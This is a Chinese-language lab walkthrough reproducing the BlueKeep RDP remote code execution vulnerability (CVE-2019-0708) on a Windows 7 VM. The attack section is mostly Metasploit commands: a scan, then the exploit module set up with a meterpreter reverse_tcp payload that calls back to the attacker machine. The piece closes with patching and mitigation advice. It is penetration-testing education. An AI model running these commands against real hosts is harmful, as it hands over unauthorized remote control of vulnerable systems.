CVE-2019-0708远程桌面服务(RDP)远程代码执行漏洞复现

漏洞描述

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞RDP,该漏洞影响了某些旧版本的Windows系统。基于漏洞影响范围较大,级别较高。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。

 

受影响系统及应用版本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

Windows 7 for 32-bit Systems Service Pack 1

Windows 7 for x64-based Systems Service Pack 1

Windows Server 2008 for 32-bit Systems Service Pack 2

Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)

Windows Server 2008 for Itanium-Based Systems Service Pack 2

Windows Server 2008 for x64-based Systems Service Pack 2

Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)

Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1

Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)

Windows XP SP3 x86

Windows XP Professional x64 Edition SP2

Windows XP Embedded SP3 x86

Windows Server 2003 SP2 x86

Windows Server 2003 x64 Edition SP2

 

漏洞复现(远程代码执行)

需要的工具

metasploit-framework

 

需要的环境

Windows 7

Windows 7 Ultimate with Service Pack 1 (x64)

 

攻击机:Kali Linux IP:192.168.10.128

靶机:Windows 7 IP:192.168.10.130

 

复现过程

0708漏洞利用方式是通过RDP协议进行攻击的,所以3389端口当然要打开啦

image-20200610094013463

 

在kali里打开msf

1

msfconsole
image-20200610094249597

 

搜索CVE-2019-0708的漏洞利用模块

1

search CVE-2019-0708

image-20200610094451789

 

可以看到有两个模块,第一的是扫描的模块,第二个是利用的模块

那就先使用扫描模块看看目标主机是否存在漏洞,如果存在的话再进行利用

1
2
3

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep //选择扫描模块
set rhosts 192.168.10.130	//设置要扫描的地址
run	//运行

image-20200610095958890

 

可以看到目标机是存在漏洞的,那我们就继续

1
2

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce	//选择漏洞利用模块
options	//查看模块利用所需要的设置
image-20200610100222202

 

这里为yes的都是需要去设置的

1
2
3
4

set rhosts 192.168.10.130	//设置目标主机的地址
set payload windows/x64/meterpreter/reverse_tcp	//设置payload
set lhost 192.168.10.128	//设置攻击机的地址
set lport 6666	//设置目标主机回连至攻击机的端口

image-20200610100737595

 

再看一下有没有漏配置的

image-20200610100858534

 

都配置好了,那就运行下看结果

image-20200610101050186

 

咦,怎么不成功……看了一下还需要配置个target

那就看看需要配置成啥

1

show targets
image-20200610101218082

 

这边我们的目标机是Windows 7,并且我是安装在VMware里面的,那就设置成4

1

set target 4

设置完,再运行一下

image-20200610102042112

 

成功弹回来了会话,证明成功了

image-20200610102329996

 

修复方法

1、使用360一键检测修复工具

http://dl.360safe.com/leakfixer/360SysVulTerminator.exe

2、及时安装微软发布的安全更新补丁

Microsoft官方已经在 2019年5月14日修复了该漏洞,用户可以通过安装微软的安全更新来给系统打上安全补丁

下载地址为:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708

3、同时针对已不受微软更新支持的系统Windows Server 2003和Windows XP提供的安全更新

下载地址:https://support.microsoft.com/zh-cn/help/4500705/customer-guidance-for-cve-2019-0708

4、禁用远程桌面服务

5、开启网络级别身份验证(NLA),此方案适用于Windows 7,Windows Server 2008,Windows Server 2008 R2

4和5只能暂时性针对该漏洞对系统进行部分缓解,强烈建议在条件允许的情况下及时安装微软安全更新